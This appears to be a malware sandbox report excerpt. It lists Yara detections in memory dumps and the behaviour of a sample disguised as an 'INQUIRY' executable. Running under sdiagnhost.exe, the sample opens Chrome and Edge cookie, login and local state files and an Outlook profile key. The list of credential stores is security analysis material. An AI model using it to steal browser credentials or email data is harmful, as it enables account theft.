Source: Yara match	File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY